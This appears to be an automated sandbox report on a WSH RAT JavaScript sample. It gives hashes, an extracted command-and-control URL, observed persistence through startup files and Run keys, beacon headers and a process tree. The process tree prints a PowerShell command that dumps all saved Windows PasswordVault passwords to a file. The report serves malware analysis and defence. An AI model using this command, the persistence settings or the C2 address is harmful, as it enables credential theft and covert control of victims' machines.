Analysis
-
max time kernel
71s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01-11-2022 08:16
Static task
static1
Behavioral task
behavioral1
Sample
FCR22001306.js
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
FCR22001306.js
Resource
win10v2004-20220812-en
General
-
Target
FCR22001306.js
-
Size
268KB
-
MD5
d873c25379f94f8a1803f4c968befaf6
-
SHA1
13293c020e2eec88e5627a44ec8eafa3b0d0f6ab
-
SHA256
da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4
-
SHA512
d3ee46a7e61496230bb65082b5c07c4641c965ed523471d548bd1694e7df0f8d6c5c851f99dba5a981454224cdeac4ba0f1ed30266d8235d11e111db983be062
-
SSDEEP
3072:xGFYHhbq8fCQFiem5yBmExNr2sBB1fbNQnTXFEZhRZfUQ0jShn8nc2KVHybnuRAL:sF8fCQHWsBBJpYEPfM3jY2+4CAU9i
Malware Config
Extracted
wshrat
http://egodds.longmusic.com:2084
Signatures
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/files/0x000600000002334f-146.dat MailPassView behavioral2/files/0x000600000002334f-147.dat MailPassView -
Nirsoft 2 IoCs
resource yara_rule behavioral2/files/0x000600000002334f-146.dat Nirsoft behavioral2/files/0x000600000002334f-147.dat Nirsoft -
Blocklisted process makes network request 9 IoCs
flow pid Process 8 1128 wscript.exe 9 4380 wscript.exe 11 1128 wscript.exe 19 1128 wscript.exe 20 1128 wscript.exe 24 1128 wscript.exe 27 1128 wscript.exe 29 4380 wscript.exe 41 4380 wscript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js wscript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js wscript.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\"" wscript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\"" wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 4952 taskkill.exe 1680 taskkill.exe -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 20 WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 24 WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 11 WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 19 WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1128 wrote to memory of 4380 1128 wscript.exe 81 PID 1128 wrote to memory of 4380 1128 wscript.exe 81
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"2⤵
- Blocklisted process makes network request
- Drops startup file
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"2⤵PID:2336
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵PID:3196
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe3⤵
- Kills process with taskkill
PID:4952
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵PID:732
-
-
C:\Users\Admin\AppData\Local\Temp\cmdc.exe"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata2⤵PID:4024
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"2⤵PID:3236
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe1⤵
- Kills process with taskkill
PID:1680
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
373B
MD570e69155b8080b5db35191ab8426d084
SHA1383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342
-
Filesize
100KB
MD554e8ded7b148a13d3363ac7b33f6eb06
SHA163dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349
-
Filesize
100KB
MD554e8ded7b148a13d3363ac7b33f6eb06
SHA163dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349
-
Filesize
1KB
MD5c416c12d1b2b1da8c8655e393b544362
SHA1fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA2560600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c
-
Filesize
10KB
MD518aa18aca1d624556d87fd1c3c8dfc4a
SHA145509a074cd5f5d11d507a7fe0bcb733f874e90d
SHA25627765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036
SHA51280e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a